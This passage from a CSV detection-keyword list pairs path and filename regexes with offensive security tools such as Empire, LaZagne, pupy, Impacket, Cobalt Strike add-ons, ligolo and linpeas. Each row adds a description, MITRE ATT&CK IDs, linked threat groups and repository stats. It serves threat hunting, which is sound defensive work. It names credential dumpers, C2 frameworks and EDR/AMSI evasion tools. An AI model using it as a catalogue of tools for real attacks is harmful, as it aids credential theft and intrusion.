TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/lateral_movement/*",".{0,1000}\/lateral_movement\/.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/lateral_movement/*.ps1",".{0,1000}\/lateral_movement\/.{0,1000}\.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1092","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/lazagne.exe*",".{0,1000}\/lazagne\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/LaZagne.git*",".{0,1000}\/LaZagne\.git.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*/laZagne.py*",".{0,1000}\/laZagne\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*/LaZagne.py*",".{0,1000}\/LaZagne\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/lazagne.zip*",".{0,1000}\/lazagne\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/LaZagne/Windows/*",".{0,1000}\/LaZagne\/Windows\/.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/ldap.py*",".{0,1000}\/ldap\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/ldap_injection.txt*",".{0,1000}\/ldap_injection\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ldap_search_bof.py*",".{0,1000}\/ldap_search_bof\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*/ldap-brute.nse*",".{0,1000}\/ldap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ldap-checker.py*",".{0,1000}\/ldap\-checker\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/ldapnomnom@latest*",".{0,1000}\/ldapnomnom\@latest.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" 
"*/ldap-novell-getpass.nse*",".{0,1000}\/ldap\-novell\-getpass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/LDAP-Password-Hunter.git*",".{0,1000}\/LDAP\-Password\-Hunter\.git.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*/LDAPPER.git*",".{0,1000}\/LDAPPER\.git.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","1","N/A","7","1","87","9","2022-09-30T23:28:28Z","2020-06-17T16:53:35Z" "*/ldapper.py*",".{0,1000}\/ldapper\.py.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","1","N/A","7","1","87","9","2022-09-30T23:28:28Z","2020-06-17T16:53:35Z" "*/LDAPPER-master*",".{0,1000}\/LDAPPER\-master.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","0","N/A","7","1","87","9","2022-09-30T23:28:28Z","2020-06-17T16:53:35Z" "*/ldapph.db*",".{0,1000}\/ldapph\.db.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - 
TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*/LdapRelayScan.git*",".{0,1000}\/LdapRelayScan\.git.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","5","427","61","2024-03-13T20:04:51Z","2022-01-16T06:50:44Z" "*/ldap-rootdse.nse*",".{0,1000}\/ldap\-rootdse\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ldap-search.nse*",".{0,1000}\/ldap\-search\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ldapsearch-ad.git*",".{0,1000}\/ldapsearch\-ad\.git.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","N/A","5","2","142","32","2024-03-25T13:05:26Z","2019-12-08T00:25:57Z" "*/ldapsearch-ad.py*",".{0,1000}\/ldapsearch\-ad\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/LDAPWordlistHarvester.git*",".{0,1000}\/LDAPWordlistHarvester\.git.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","288","22","2024-03-14T17:52:34Z","2023-09-22T10:10:10Z" "*/ldeep/*",".{0,1000}\/ldeep\/.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" "*/ldeepDump*",".{0,1000}\/ldeepDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of 
Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/LdrLockLiberator.git*",".{0,1000}\/LdrLockLiberator\.git.{0,1000}","offensive_tool_keyword","LdrLockLiberator","LdrLockLiberator is a collection of techniques for escaping or otherwise forgoing Loader Lock while executing your code from DllMain or anywhere else the lock may be present.","T1574.002 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/ElliotKillick/LdrLockLiberator","1","1","N/A","9","4","313","55","2024-04-28T21:16:21Z","2023-10-31T10:11:16Z" "*/legba.git*",".{0,1000}\/legba\.git.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","1","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*/legba/target/release/legba*",".{0,1000}\/legba\/target\/release\/legba.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*/letmein.ps1*",".{0,1000}\/letmein\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" 
"*/LetMeOutSharp/*",".{0,1000}\/LetMeOutSharp\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","140","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" "*/LetMeowIn.git*",".{0,1000}\/LetMeowIn\.git.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","1","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*/lexmark-config.nse*",".{0,1000}\/lexmark\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/lfs_injection.exe*",".{0,1000}\/lfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/lgandx/Responder*",".{0,1000}\/lgandx\/Responder.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/lib/GHunt/*",".{0,1000}\/lib\/GHunt\/.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","10","970","103","2024-04-07T21:32:39Z","2020-04-07T22:25:38Z" "*/lib/ipLookupHelper.py*",".{0,1000}\/lib\/ipLookupHelper\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*/lib/msf/*",".{0,1000}\/lib\/msf\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/libgobuster*",".{0,1000}\/libgobuster.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*/liboffsetfinder64*",".{0,1000}\/liboffsetfinder64.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/LibSnaffle*",".{0,1000}\/LibSnaffle.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","Discovery","https://github.com/Group3r/Group3r","1","1","AD Enumeration","7","6","592","55","2024-03-19T03:08:39Z","2021-07-05T05:05:42Z" "*/LightsOut.git*",".{0,1000}\/LightsOut\.git.{0,1000}","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/icyguider/LightsOut","1","1","N/A","10","4","304","43","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z" "*/ligolo.git*",".{0,1000}\/ligolo\.git.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*/ligolo-ng*",".{0,1000}\/ligolo\-ng.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*/ligolo-ng.git*",".{0,1000}\/ligolo\-ng\.git.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*/ligolo-ng/releases*",".{0,1000}\/ligolo\-ng\/releases.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*/Lime-Crypter.git*",".{0,1000}\/Lime\-Crypter\.git.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","1","N/A","9","5","445","192","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z" "*/LinEnum.git*",".{0,1000}\/LinEnum\.git.{0,1000}","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","10","10","6668","1964","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" "*/LinEnum/*",".{0,1000}\/LinEnum\/.{0,1000}","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege 
Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","10","10","6668","1964","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" "*/linikatz.git*",".{0,1000}\/linikatz\.git.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","1","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*/LinikatzV2/*",".{0,1000}\/LinikatzV2\/.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","N/A","10","2","125","13","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z" "*/linpeas.sh*",".{0,1000}\/linpeas\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*/linpeas.sh*",".{0,1000}\/linpeas\.sh.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/linpeas.sh*",".{0,1000}\/linpeas\.sh.{0,1000}","offensive_tool_keyword","PEASS","PEASS - 